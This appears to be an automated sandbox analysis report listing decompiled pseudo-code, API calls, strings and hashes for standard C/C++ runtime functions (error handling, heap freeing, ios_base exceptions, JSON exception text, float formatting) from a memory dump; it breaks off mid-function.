Instruction ID: f9948bb4f53495da3d51da23fef36c75a6211a7a4eab3bd6f5a21648fa140d99
Opcode Fuzzy Hash: a074a44c66b17afc6c4d33033072391ebc092e8c24070dc7851116978218d5c3
Instruction Fuzzy Hash: B841D372F883049FCB10CF78C880A6DB3B5EF85718B268169D515EB341DB31E906CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1D683, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6DE1D683(void* __ecx, void* __edx) {
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x6de951e4; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E6DE1C7EF(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E6DE24196(_t13, __eflags,  *0x6de951e4, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E6DE1D33F(_t13, _t16, 0x6de976f0);
							E6DE1CBD3(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E6DE1CBD3();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E6DE24140(_t11, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x6de1d683
0x6de1d68e
0x6de1d690
0x6de1d692
0x6de1d697
0x6de1d69a
0x6de1d6a8
0x6de1d6b4
0x6de1d6b7
0x6de1d6ba
0x6de1d6cc
0x6de1d6d1
0x6de1d6d3
0x6de1d6de
0x6de1d6e4
0x6de1d6ec
0x6de1d6ee
0x00000000
0x00000000
0x00000000
0x00000000
0x6de1d6d5
0x6de1d6d5
0x00000000
0x6de1d6d5
0x6de1d6bc
0x6de1d6bc
0x6de1d6bd
0x6de1d6bd
0x6de1d6f0
0x6de1d6f1
0x6de1d6f1
0x6de1d69c
0x6de1d6a2
0x6de1d6a6
0x6de1d6f9
0x6de1d6fa
0x6de1d700
0x00000000
0x00000000
0x00000000
0x6de1d6a6
0x6de1d707

APIs

GetLastError.KERNEL32(6DDD75D9,6DDD75D9,00000002,6DE12286,6DE1F2B0,00000000,?,6DDF0F8B,00000002,00000000,?,?,?,6DDB1298,6DDD75D9,00000004), ref: 6DE1D688
_free.LIBCMT ref: 6DE1D6BD
_free.LIBCMT ref: 6DE1D6E4
SetLastError.KERNEL32(00000000,?,6DDD75D9), ref: 6DE1D6F1
SetLastError.KERNEL32(00000000,?,6DDD75D9), ref: 6DE1D6FA

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: ccd6cd1cab0488a2afa364c5fa5d2c469bf271762c647104b10166805873b055
Instruction ID: 6d0c336296668fd6d46426aa1a31bdbf9366203fc09114c24cd40b4279ae24e4
Opcode Fuzzy Hash: ccd6cd1cab0488a2afa364c5fa5d2c469bf271762c647104b10166805873b055
Instruction Fuzzy Hash: 9401A97E38D90227C70256355C89FBB3779ABD367DB72012AF518E6241EF74C8064168

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2CCC3, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE2CCC3(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6de950b8; // 0x6de950b0
					if(_t23 != 0) {
						E6DE1CBD3(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6de950bc; // 0x6de97248
					if(_t24 != 0) {
						E6DE1CBD3(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6de950c0; // 0x6de97248
					if(_t25 != 0) {
						E6DE1CBD3(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6de950e8; // 0x6de950b4
					if(_t26 != 0) {
						E6DE1CBD3(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6de950ec; // 0x6de9724c
					if(_t27 != 0) {
						return E6DE1CBD3(_t6);
					}
				}
				return _t6;
			}

0x6de2ccc9
0x6de2ccce
0x6de2ccd2
0x6de2ccd8
0x6de2ccdb
0x6de2cce0
0x6de2cce4
0x6de2ccea
0x6de2cced
0x6de2ccf2
0x6de2ccf6
0x6de2ccfc
0x6de2ccff
0x6de2cd04
0x6de2cd08
0x6de2cd0e
0x6de2cd11
0x6de2cd16
0x6de2cd17
0x6de2cd1a
0x6de2cd20
0x00000000
0x6de2cd28
0x6de2cd20
0x6de2cd2b

APIs

_free.LIBCMT ref: 6DE2CCDB

Part of subcall function 6DE1CBD3: HeapFree.KERNEL32(00000000,00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000), ref: 6DE1CBE9
Part of subcall function 6DE1CBD3: GetLastError.KERNEL32(00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000,00000000), ref: 6DE1CBFB

_free.LIBCMT ref: 6DE2CCED
_free.LIBCMT ref: 6DE2CCFF
_free.LIBCMT ref: 6DE2CD11
_free.LIBCMT ref: 6DE2CD23

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 254188fbf3d2b37c54262ccfbb85913313a02e98c73309f714a71d4b326f34fb
Instruction ID: 4ae0d2411ec80398bc369d2cd4c0d3d51c71714858a09412778a6c4f65e82bf4
Opcode Fuzzy Hash: 254188fbf3d2b37c54262ccfbb85913313a02e98c73309f714a71d4b326f34fb
Instruction Fuzzy Hash: BEF04F3170A20597CB10CA59E8C1D7B77FAAB0571C7714C0AE028EBA01CF30F8908AE0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD4267, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6DDD4267(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t44;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t56;
				intOrPtr _t58;
				void* _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t76;
				intOrPtr _t81;
				signed int _t82;
				void* _t85;
				signed int _t87;
				signed int _t89;

				E6DDF0117(0x6de380ee, __ebx, __edi, __esi, 0x20);
				 *((intOrPtr*)(_t85 - 0x14)) = 0x6de96b60;
				_t65 = E6DE11EEC(L"For");
				_t38 =  *0x6de96b60; // 0x6de3aabc
				 *((intOrPtr*)(_t85 - 0x18)) = _t65;
				_t3 = _t38 + 4; // 0x8
				_t39 =  *_t3;
				_t4 = _t39 + 0x6de96b84; // 0x0
				_t62 =  *_t4;
				_t5 = _t39 + 0x6de96b80; // 0x0
				_t81 =  *_t5;
				_t87 = _t62;
				if(_t87 < 0) {
					L7:
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x24], xmm0");
					_t62 =  *(_t85 - 0x20);
					_t82 =  *(_t85 - 0x24);
				} else {
					if(_t87 > 0) {
						L6:
						_t82 = _t81 - _t65;
						asm("sbb ebx, esi");
					} else {
						if(_t81 <= 0) {
							goto L7;
						} else {
							_t89 = _t62;
							if(_t89 < 0 || _t89 <= 0 && _t81 <= _t65) {
								goto L7;
							} else {
								goto L6;
							}
						}
					}
				}
				_t8 = _t85 - 0x14; // 0x6de96b60
				_push( *_t8);
				E6DDD220B(_t62, _t85 - 0x2c, _t82, 0);
				 *((intOrPtr*)(_t85 - 4)) = 0;
				if( *((char*)(_t85 - 0x28)) != 0) {
					 *((char*)(_t85 - 4)) = 1;
					_t67 =  *0x6de96b60; // 0x6de3aabc
					_t13 = _t67 + 4; // 0x8
					_t14 =  *_t13 + 0x6de96b74; // 0x201
					__eflags = ( *_t14 & 0x000001c0) - 0x40;
					if(( *_t14 & 0x000001c0) == 0x40) {
						L16:
						_t18 = _t67 + 4; // 0x8
						_t44 =  *_t18;
						_t20 = _t44 + 0x6de96b98; // 0x6de96bb0
						_t46 =  *((intOrPtr*)( *((intOrPtr*)( *_t20)) + 0x24))(L"For",  *((intOrPtr*)(_t85 - 0x18)), 0);
						__eflags = _t46 -  *((intOrPtr*)(_t85 - 0x18));
						if(_t46 !=  *((intOrPtr*)(_t85 - 0x18))) {
							goto L22;
						} else {
							__eflags = _t76;
							if(_t76 != 0) {
								goto L22;
							} else {
								while(1) {
									__eflags = _t62;
									if(__eflags < 0) {
										break;
									}
									if(__eflags > 0) {
										L21:
										_t54 =  *0x6de96b60; // 0x6de3aabc
										_t23 = _t54 + 4; // 0x8
										_t55 =  *_t23;
										_t24 = _t55 + 0x6de96ba0; // 0x20
										_t25 = _t55 + 0x6de96b98; // 0x6de96bb0
										_t56 = E6DDD3F18( *_t25,  *_t24 & 0x0000ffff);
										__eflags = 0xffff - _t56;
										if(0xffff != _t56) {
											_t82 = _t82 + 0xffffffff;
											asm("adc ebx, 0xffffffff");
											continue;
										} else {
											goto L22;
										}
									} else {
										__eflags = _t82;
										if(_t82 <= 0) {
											break;
										} else {
											goto L21;
										}
									}
									goto L25;
								}
								_t63 = 0;
							}
						}
					} else {
						while(1) {
							__eflags = _t62;
							if(__eflags < 0) {
								goto L16;
							}
							if(__eflags > 0) {
								L14:
								_t15 = _t67 + 4; // 0x8
								_t58 =  *_t15;
								_t16 = _t58 + 0x6de96ba0; // 0x20
								_t76 =  *_t16 & 0x0000ffff;
								_t17 = _t58 + 0x6de96b98; // 0x6de96bb0
								_t59 = E6DDD3F18( *_t17, _t76);
								__eflags = 0xffff - _t59;
								if(0xffff == _t59) {
									L22:
									_t63 = 4;
								} else {
									_t67 =  *0x6de96b60; // 0x6de3aabc
									_t82 = _t82 + 0xffffffff;
									asm("adc ebx, 0xffffffff");
									continue;
								}
							} else {
								__eflags = _t82;
								if(_t82 <= 0) {
									goto L16;
								} else {
									goto L14;
								}
							}
							goto L25;
						}
						goto L16;
					}
					L25:
					_t47 =  *0x6de96b60; // 0x6de3aabc
					_t26 = _t47 + 4; // 0x8
					_t48 =  *_t26;
					 *((intOrPtr*)(_t48 + 0x6de96b80)) = 0;
					 *((intOrPtr*)(_t48 + 0x6de96b84)) = 0;
					 *((intOrPtr*)(_t85 - 4)) = 0;
				} else {
					_t63 = 4;
				}
				_t49 =  *0x6de96b60; // 0x6de3aabc
				_t30 = _t49 + 4; // 0x8
				_t32 =  *_t30 +  *((intOrPtr*)(_t85 - 0x14)) + 0xc; // 0x0
				E6DDD3A25( *_t30 +  *((intOrPtr*)(_t85 - 0x14)),  *_t32 | _t63, 0);
				E6DDD21C1(_t63, _t85 - 0x2c, _t82,  *_t32 | _t63);
				return E6DDF0075( *((intOrPtr*)(_t85 - 0x14)));
			}

0x6ddd426e
0x6ddd4278
0x6ddd4287
0x6ddd4289
0x6ddd428e
0x6ddd4291
0x6ddd4291
0x6ddd4294
0x6ddd4294
0x6ddd429a
0x6ddd429a
0x6ddd42a0
0x6ddd42a2
0x6ddd42ba
0x6ddd42ba
0x6ddd42bd
0x6ddd42c2
0x6ddd42c5
0x6ddd42a4
0x6ddd42a4
0x6ddd42b4
0x6ddd42b4
0x6ddd42b6
0x6ddd42a6
0x6ddd42a8
0x00000000
0x6ddd42aa
0x6ddd42aa
0x6ddd42ac
0x00000000
0x00000000
0x00000000
0x00000000
0x6ddd42ac
0x6ddd42a8
0x6ddd42a4
0x6ddd42c8
0x6ddd42c8
0x6ddd42ce
0x6ddd42d3
0x6ddd42da
0x6ddd42e4
0x6ddd42e8
0x6ddd42ee
0x6ddd42f1
0x6ddd42fc
0x6ddd42ff
0x6ddd433c
0x6ddd433c
0x6ddd433c
0x6ddd4343
0x6ddd4350
0x6ddd4353
0x6ddd4356
0x00000000
0x6ddd4358
0x6ddd4358
0x6ddd435a
0x00000000
0x6ddd435c
0x6ddd435c
0x6ddd435c
0x6ddd435e
0x00000000
0x00000000
0x6ddd4360
0x6ddd4366
0x6ddd4366
0x6ddd436b
0x6ddd436b
0x6ddd436e
0x6ddd4375
0x6ddd437c
0x6ddd4389
0x6ddd438c
0x6ddd4393
0x6ddd4396
0x00000000
0x00000000
0x00000000
0x00000000
0x6ddd4362
0x6ddd4362
0x6ddd4364
0x00000000
0x00000000
0x00000000
0x00000000
0x6ddd4364
0x00000000
0x6ddd4360
0x6ddd439b
0x6ddd439b
0x6ddd435a
0x6ddd4301
0x6ddd4301
0x6ddd4301
0x6ddd4303
0x00000000
0x00000000
0x6ddd4305
0x6ddd430b
0x6ddd430b
0x6ddd430b
0x6ddd430e
0x6ddd430e
0x6ddd4315
0x6ddd431c
0x6ddd4329
0x6ddd432c
0x6ddd438e
0x6ddd4390
0x6ddd432e
0x6ddd432e
0x6ddd4334
0x6ddd4337
0x00000000
0x6ddd4337
0x6ddd4307
0x6ddd4307
0x6ddd4309
0x00000000
0x00000000
0x00000000
0x00000000
0x6ddd4309
0x00000000
0x6ddd4305
0x00000000
0x6ddd4301
0x6ddd439d
0x6ddd439d
0x6ddd43a2
0x6ddd43a2
0x6ddd43a5
0x6ddd43ab
0x6ddd43d6
0x6ddd42dc
0x6ddd42de
0x6ddd42de
0x6ddd43d9
0x6ddd43df
0x6ddd43e5
0x6ddd43eb
0x6ddd43f3
0x6ddd4400

APIs

__EH_prolog3_catch.LIBCMT ref: 6DDD426E
_wcslen.LIBCMT ref: 6DDD4281

Strings

For, xrefs: 6DDD4273, 6DDD4349
`km, xrefs: 6DDD42C8

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: H_prolog3_catch_wcslen
String ID: For$`km
API String ID: 1260878687-3792942803
Opcode ID: ca82adb1bb82c42f11cdc051c11f0ce3c77017376939d9203cfb10d14ac3ccb2
Instruction ID: 805db1fb6d86b2328a830b479fcb17d80f09f27435e626f7e2a550b16db03027
Opcode Fuzzy Hash: ca82adb1bb82c42f11cdc051c11f0ce3c77017376939d9203cfb10d14ac3ccb2
Instruction Fuzzy Hash: 6341BE7964521DCFCF54EB9CCA909AC77F1BB4D728B21824AF5509B396EB30A841CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6DE28AAC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6DE28AAC(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v264;
				char _v268;
				char _v272;
				void* __esi;
				void* __ebp;
				signed int _t10;
				void* _t14;
				signed int _t22;
				void* _t28;
				signed int _t37;
				signed int _t43;
				void* _t44;
				signed int _t45;
				signed int _t49;

				_t35 = __edx;
				_t47 = _t49;
				_t10 =  *0x6de9506c; // 0xc4837075
				_v8 = _t10 ^ _t49;
				 *0x6de95384 =  *0x6de95384 | 0xffffffff;
				 *0x6de95378 =  *0x6de95378 | 0xffffffff;
				_push(__ebx);
				_push(__edi);
				_t37 = 0;
				 *0x6de97a10 = 0;
				_t14 = E6DE21216(0x6de42130, __edx, 0, __eflags,  &_v268,  &_v264, 0x100, 0x6de42130);
				if(_t14 != 0) {
					__eflags = _t14 - 0x22;
					if(__eflags == 0) {
						_t45 = E6DE1F26D(_t28, _v268);
						__eflags = _t45;
						if(__eflags != 0) {
							_t22 = E6DE21216(0x6de42130, __edx, 0, __eflags,  &_v272, _t45, _v268, 0x6de42130);
							__eflags = _t22;
							if(_t22 == 0) {
								E6DE1CBD3(0);
								_t37 = _t45;
							} else {
								_push(_t45);
								goto L6;
							}
						} else {
							_push(0);
							L6:
							E6DE1CBD3();
						}
					}
				} else {
					_t37 =  &_v264;
				}
				asm("sbb esi, esi");
				_t43 =  ~(_t37 -  &_v264) & _t37;
				if(_t37 == 0) {
					L14:
					E6DE28951(0x6de42130, _t37, __eflags);
				} else {
					_t57 =  *_t37;
					if( *_t37 == 0) {
						goto L14;
					} else {
						_push(_t37);
						E6DE2877C(0x6de42130, _t37, _t57);
					}
				}
				E6DE1CBD3(_t43);
				_pop(_t44);
				return E6DDEF8A5(_v8 ^ _t47, _t35, _t44);
			}

0x6de28aac
0x6de28aaf
0x6de28ab7
0x6de28abe
0x6de28ac1
0x6de28ace
0x6de28ad5
0x6de28ad7
0x6de28add
0x6de28aec
0x6de28af3
0x6de28afd
0x6de28b07
0x6de28b0a
0x6de28b17
0x6de28b1a
0x6de28b1c
0x6de28b35
0x6de28b3d
0x6de28b3f
0x6de28b45
0x6de28b4a
0x6de28b41
0x6de28b41
0x00000000
0x6de28b41
0x6de28b1e
0x6de28b1e
0x6de28b1f
0x6de28b1f
0x6de28b1f
0x6de28b4c
0x6de28aff
0x6de28aff
0x6de28aff
0x6de28b59
0x6de28b5b
0x6de28b5f
0x6de28b6f
0x6de28b6f
0x6de28b61
0x6de28b61
0x6de28b64
0x00000000
0x6de28b66
0x6de28b66
0x6de28b67
0x6de28b6c
0x6de28b64
0x6de28b75
0x6de28b7f
0x6de28b8b

APIs

_free.LIBCMT ref: 6DE28B1F
_free.LIBCMT ref: 6DE28B75

Part of subcall function 6DE28951: _free.LIBCMT ref: 6DE289A9
Part of subcall function 6DE28951: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6DE42130), ref: 6DE289BB
Part of subcall function 6DE28951: WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6DE28A33
Part of subcall function 6DE28951: WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A70,000000FF,?,0000003F,00000000,?), ref: 6DE28A60

Strings

0!m, xrefs: 6DE28AD8

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!m
API String ID: 314583886-1802470889
Opcode ID: a1516be8009e6d6218257d5be31e6df41ada674dde14e6ffb0c0e35d57eb7144
Instruction ID: 382091a1cc9b4e2e4ce92b309c3f226dc709ba75f3698e4bb3b12b129e784dad
Opcode Fuzzy Hash: a1516be8009e6d6218257d5be31e6df41ada674dde14e6ffb0c0e35d57eb7144
Instruction Fuzzy Hash: DD210BB6D0921997DB2196248CC0EEBB778DB4272CF31069ED594F6240DF704D8186E1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDB1EEA, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E6DDB1EEA(void* __ecx, void* __edx, void* __esi, signed int _a4, char _a8) {
				char _v12;
				char _v32;
				signed int _t14;
				void* _t19;
				signed char _t24;
				void* _t27;
				char* _t31;

				_t27 = __edx;
				_t14 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t14;
				_t24 =  *(__ecx + 0x10) & _t14;
				if(_t24 == 0) {
					return _t14;
				} else {
					if(_a8 != 0) {
						_push(0);
						_push(0);
					} else {
						if((_t24 & 0x00000004) == 0) {
							_t31 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
						} else {
							_t31 = "ios_base::badbit set";
						}
						_t19 = E6DDB1CA2(_t24, _t27,  &_v12, 1);
						_t24 =  &_v32;
						E6DDB1EBD(_t24, _t31, _t19);
						_push(0x6de93568);
						_push( &_v32);
					}
					E6DDF3D74();
					asm("int3");
					return  *((intOrPtr*)(_t24 + 0xc));
				}
			}

0x6ddb1eea
0x6ddb1ef3
0x6ddb1ef6
0x6ddb1efd
0x6ddb1eff
0x6ddb1f47
0x6ddb1f01
0x6ddb1f05
0x6ddb1f4a
0x6ddb1f4c
0x6ddb1f07
0x6ddb1f0a
0x6ddb1f20
0x6ddb1f0c
0x6ddb1f0c
0x6ddb1f0c
0x6ddb1f29
0x6ddb1f32
0x6ddb1f35
0x6ddb1f3a
0x6ddb1f42
0x6ddb1f42
0x6ddb1f4e
0x6ddb1f53
0x6ddb1f57
0x6ddb1f57

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6DDB1F4E

Strings

ios_base::eofbit set, xrefs: 6DDB1F1B
ios_base::badbit set, xrefs: 6DDB1F0C, 6DDB1F31
ios_base::failbit set, xrefs: 6DDB1F16

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 28be81a5fbc4420a2a737ad1c5f20c5d0ae2655bacb914dc591b811f8ad807bd
Instruction ID: f47176a715c18097dab74ff1d28cf661148141fc4ab29d83113596346a1ba24b
Opcode Fuzzy Hash: 28be81a5fbc4420a2a737ad1c5f20c5d0ae2655bacb914dc591b811f8ad807bd
Instruction Fuzzy Hash: 8EF0CDF3D042157ADB00EB58DD42FE977A85B0831CF34C459FA52AB182EB75E905C761

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD407D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6DDD407D(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t30;
				void* _t33;

				E6DDF00AC(0x6de3808e, __ebx, __edi, __esi, 8);
				_t30 = __ecx;
				 *((intOrPtr*)(_t33 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t33 - 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
				 *((char*)(__ecx)) = 0;
				 *((intOrPtr*)(_t33 - 4)) = 0;
				 *((intOrPtr*)(_t33 - 0x10)) = 1;
				E6DDD5192(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + 0x10)) + E6DE11D60("[json.exception."));
				E6DDD2D14(_t30, "[json.exception.", E6DE11D60("[json.exception."));
				E6DDD1F57( *((intOrPtr*)(_t33 + 8)));
				return E6DDF0075(_t30);
			}

0x6ddd4084
0x6ddd4089
0x6ddd408b
0x6ddd4090
0x6ddd4093
0x6ddd4096
0x6ddd409d
0x6ddd40a4
0x6ddd40a8
0x6ddd40c0
0x6ddd40d0
0x6ddd40d8
0x6ddd40e4

APIs

__EH_prolog3.LIBCMT ref: 6DDD4084
_strlen.LIBCMT ref: 6DDD40AF
_strlen.LIBCMT ref: 6DDD40C6

Strings

[json.exception., xrefs: 6DDD409F, 6DDD40A7, 6DDD40C5, 6DDD40CD

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: _strlen$H_prolog3
String ID: [json.exception.
API String ID: 2883720156-791563284
Opcode ID: 17d0351100cdcfb3d7337d34b987945a74613e3d06462b6dc45fe55787bc25ae
Instruction ID: 76bcc342f288f5b8216a3a33b462f39746761a4f17685ecad2a563f658d71656
Opcode Fuzzy Hash: 17d0351100cdcfb3d7337d34b987945a74613e3d06462b6dc45fe55787bc25ae
Instruction Fuzzy Hash: 37F01DB0608205AFDB44AF78D84067EB6A9FF84248F66051DA519DB241DFB4594187A2

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1F345, Relevance: 6.3, APIs: 4, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6DE1F345(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E6DE01F60(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E6DE375C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E6DE375C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
